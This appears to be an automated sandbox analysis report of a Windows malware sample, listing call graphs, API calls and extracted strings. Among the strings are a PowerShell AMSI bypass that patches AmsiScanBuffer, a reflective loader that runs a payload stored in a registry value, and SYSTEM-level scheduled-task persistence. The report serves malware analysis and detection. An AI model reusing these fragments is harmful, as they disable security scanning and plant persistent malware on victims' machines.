                          execution_graph 238 401798 241 4017a5 FindResourceA 238->241 242 40179d ExitProcess 241->242 243 4017c5 SizeofResource 241->243 243->242 244 4017d8 LoadResource 243->244 244->242 245 4017e4 LockResource RegOpenKeyExW 244->245 245->242 246 40180b RegSetValueExW 245->246 246->242 247 401822 246->247 259 401868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 401835 252 401674 9 API calls 251->252 253 401841 252->253 306 40112f GetCurrentProcess IsWow64Process 253->306 257 401854 257->242 319 40151a SysAllocString SysAllocString CoInitializeEx 257->319 329 401159 259->329 261 401893 262 4018c5 StrCatW StrCatW 261->262 263 40189d StrCatW 261->263 332 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 262->332 264 40112f 2 API calls 263->264 266 4018aa StrCatW StrCatW 264->266 266->262 271 401986 6 API calls 272 4018f0 271->272 273 401986 6 API calls 272->273 274 4018fc 273->274 275 401986 6 API calls 274->275 276 401908 275->276 277 401986 6 API calls 276->277 278 401914 277->278 279 401986 6 API calls 278->279 280 401920 279->280 281 401986 6 API calls 280->281 282 40192c 281->282 283 401986 6 API calls 282->283 284 401938 283->284 285 401986 6 API calls 284->285 286 401944 285->286 287 401986 6 API calls 286->287 288 401950 287->288 289 401986 6 API calls 288->289 290 40195c 289->290 291 401986 6 API calls 290->291 292 401968 291->292 293 401986 6 API calls 292->293 294 401974 293->294 295 401986 6 API calls 294->295 296 401827 295->296 297 401674 SysAllocString SysAllocString CoInitializeEx 296->297 298 401782 297->298 299 4016a7 CoInitializeSecurity 297->299 302 401785 SysFreeString SysFreeString 298->302 300 4016c8 CoCreateInstance 299->300 301 4016bd 299->301 303 4016ea VariantInit 300->303 305 40172d CoUninitialize 300->305 301->300 301->305 302->251 303->305 305->302 307 40114e 306->307 308 4011ad 7 API calls 307->308 309 4014f0 308->309 310 401209 CoInitializeSecurity 308->310 311 4014f3 6 API calls 309->311 312 40122a CoCreateInstance 310->312 313 40121f 310->313 311->257 314 401444 CoUninitialize 312->314 315 40124c VariantInit 312->315 313->312 313->314 314->311 317 40128f 315->317 317->314 318 4013dd VariantInit VariantInit VariantInit 317->318 318->314 320 40154d CoInitializeSecurity 319->320 321 40165f SysFreeString SysFreeString 319->321 322 401563 320->322 323 40156e CoCreateInstance 320->323 321->242 322->323 324 401659 CoUninitialize 322->324 323->324 325 401590 VariantInit 323->325 324->321 326 4015d3 325->326 327 401605 VariantInit 326->327 328 40162b 326->328 327->328 328->324 352 40118e GetModuleHandleA 329->352 331 401178 331->261 355 401000 CryptAcquireContextW 332->355 335 401a37 StrStrIW 337 401a9d 335->337 336 4018d8 345 401986 lstrlenW 336->345 338 401b71 6 API calls 337->338 339 401a57 StrStrIW StrNCatW StrCatW 337->339 341 401b27 StrCatW 337->341 342 401afb StrCatW StrNCatW 337->342 344 401adf StrCatW StrCatW 337->344 338->336 339->337 340 401b41 StrCatW StrStrIW 339->340 340->337 341->337 341->340 343 401b18 StrCatW 342->343 343->341 344->343 358 40104b 345->358 348 4019b3 StrStrIW 349 4018e4 348->349 350 4019bf 348->350 349->271 351 4019c0 StrStrIW 350->351 351->349 351->351 353 4011aa 352->353 354 40119d GetProcAddress 352->354 353->331 354->331 356 401044 355->356 357 401028 CryptGenRandom CryptReleaseContext 355->357 356->335 356->336 357->356 359 401000 3 API calls 358->359 360 401076 359->360 360->348 360->349

                          Callgraph

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 122 401456 118->122 123 4013b9-4013c7 118->123 119->114 124 401459-401462 122->124 123->122 126 4013cd-4013db 123->126 124->119 126->122 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                          APIs
                          • SysAllocString.OLEAUT32($cnt-svc64), ref: 004011C2
                          • SysAllocString.OLEAUT32(00402234), ref: 004011CC
                          • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                          • SysAllocString.OLEAUT32(?), ref: 004011E0
                          • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                          • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                          • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                          • VariantInit.OLEAUT32(?), ref: 00401250
                          • VariantInit.OLEAUT32(?), ref: 004013EA
                          • VariantInit.OLEAUT32(?), ref: 004013F0
                          • VariantInit.OLEAUT32(?), ref: 00401400
                          • CoUninitialize.COMBASE ref: 004014E8
                          • SysFreeString.OLEAUT32(?), ref: 004014FA
                          • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                          • SysFreeString.OLEAUT32(?), ref: 00401502
                          • SysFreeString.OLEAUT32(?), ref: 00401507
                          • SysFreeString.OLEAUT32(?), ref: 0040150C
                          • SysFreeString.OLEAUT32(?), ref: 00401511
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                          • String ID: $cnt-svc32$$cnt-svc64$SYSTEM$powershell
                          • API String ID: 3960698109-2255085552
                          • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                          • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
                          • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                          • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 LoadResource 154->156 155->153 156->155 157 4017e4-401809 LockResource RegOpenKeyExW 156->157 157->155 158 40180b-401820 RegSetValueExW 157->158 158->155 159 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 158->159 159->155 170 40185a-40185c call 40151a 159->170 170->155
                          APIs
                          • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                          • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                          • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                          • RegSetValueExW.KERNELBASE(?,$cnt-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                            • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                            • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                            • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In), ref: 004018CB
                            • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                            • Part of subcall function 00401674: SysAllocString.OLEAUT32($cnt-svc32), ref: 00401686
                            • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                            • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                            • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                            • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                            • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                            • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
                            • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
                            • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
                            • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                            • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32($cnt-svc64), ref: 004011C2
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                            • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                            • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                            • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                            • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                            • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32($cnt-svc64), ref: 0040152C
                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                            • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                            • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                            • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                            • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                          • String ID: $cnt-stager$$cnt-svc32$$cnt-svc64$EXE$SOFTWARE
                          • API String ID: 2402434814-911656534
                          • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                          • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                          • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                          • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 190 401000-401026 CryptAcquireContextW 191 401044-40104a 190->191 192 401028-401041 CryptGenRandom CryptReleaseContext 190->192 192->191
                          APIs
                          • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                          • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                          • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                          Strings
                          • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: Crypt$Context$AcquireRandomRelease
                          • String ID: Microsoft Base Cryptographic Provider v1.0
                          • API String ID: 1815803762-291530887
                          • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                          • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                          • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                          • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                          Control-flow Graph

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                          • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                          • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                            • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                            • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                          • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                          • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In), ref: 004018CB
                          • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                          Strings
                          • ParameterTypes, xrefs: 004018E4
                          • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                          • AmsiScanBufferPtr, xrefs: 00401968
                          • NativeMethods, xrefs: 00401908
                          • OldProtect, xrefs: 00401974
                          • AmsiPtr, xrefs: 0040195C
                          • VirtualProtectDelegate, xrefs: 0040192C
                          • LoadLibraryPtr, xrefs: 00401944
                          • TypeBuilder, xrefs: 004018FC
                          • Kernel32Ptr, xrefs: 00401938
                          • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In, xrefs: 004018C5
                          • ReturnType, xrefs: 004018F0
                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                          • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                          • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                          • LoadLibraryDelegate, xrefs: 00401920
                          • GetProcAddress, xrefs: 00401914
                          • VirtualProtectPtr, xrefs: 00401950
                          • Get-Delegate, xrefs: 004018D8
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: Process$Heap$AllocCurrentWow64
                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$cnt-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                          • API String ID: 2666690646-1695467183
                          • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                          • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                          • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                          • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

                          Control-flow Graph

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00008000,75DB2EB0,00000000,00402238), ref: 004019F4
                          • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                          • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                          • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                            • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                            • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                            • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                          • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
                          • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
                          • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                          • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
                          • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                          • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                          • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                          • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                          • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
                          • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
                          • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                          • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                          • HeapFree.KERNEL32(00000000), ref: 00401B93
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                          • HeapFree.KERNEL32(00000000), ref: 00401B9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                          • String ID: '+'$'+[Char]($)+'
                          • API String ID: 3510167801-3465596256
                          • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                          • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
                          • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                          • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 138 401659 CoUninitialize 136->138 137->138 139 401590-4015d5 VariantInit 137->139 138->135 141 4015d7-4015ec 139->141 142 40164d-401656 139->142 141->142 145 4015ee-401603 141->145 142->138 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                          APIs
                          • SysAllocString.OLEAUT32($cnt-svc64), ref: 0040152C
                          • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                          • VariantInit.OLEAUT32(?), ref: 00401594
                          • VariantInit.OLEAUT32(?), ref: 00401609
                          • CoUninitialize.COMBASE ref: 00401659
                          • SysFreeString.OLEAUT32(00000000), ref: 00401666
                          • SysFreeString.OLEAUT32(?), ref: 0040166B
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                          • String ID: $cnt-svc32$$cnt-svc64
                          • API String ID: 2407135876-1154959919
                          • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                          • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                          • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                          • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 401674-4016a1 SysAllocString * 2 CoInitializeEx 173 401782 172->173 174 4016a7-4016bb CoInitializeSecurity 172->174 177 401785-401797 SysFreeString * 2 173->177 175 4016c8-4016e4 CoCreateInstance 174->175 176 4016bd-4016c2 174->176 178 401777 175->178 179 4016ea-401732 VariantInit 175->179 176->175 176->178 180 40177a-401780 CoUninitialize 178->180 182 401734-40174a 179->182 183 401769 179->183 180->177 184 40176c-401775 182->184 186 40174c-401752 182->186 183->184 184->180 188 401757-401767 186->188 188->184
                          APIs
                          • SysAllocString.OLEAUT32($cnt-svc32), ref: 00401686
                          • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                          • VariantInit.OLEAUT32(?), ref: 004016EE
                          • CoUninitialize.COMBASE ref: 0040177A
                          • SysFreeString.OLEAUT32(?), ref: 0040178C
                          • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID: $cnt-svc32
                          • API String ID: 4184240511-548209266
                          • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                          • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                          • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                          • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 193 401986-4019b1 lstrlenW call 40104b 196 4019b3-4019bd StrStrIW 193->196 197 4019dd-4019e0 193->197 196->197 198 4019bf 196->198 199 4019c0-4019da StrStrIW 198->199 199->199 200 4019dc 199->200 200->197
                          APIs
                          • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
                          • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                          • StrStrIW.SHLWAPI(?,Get-Delegate,75DB2EB0), ref: 004019D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: Get-Delegate
                          • API String ID: 1659193697-1365458365
                          • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                          • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                          • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                          • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 401798-40179e call 4017a5 ExitProcess
                          APIs
                            • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                            • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                            • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                            • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                            • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                            • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$cnt-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                          • ExitProcess.KERNEL32 ref: 0040179E
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                          • String ID:
                          • API String ID: 3836967525-0
                          • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
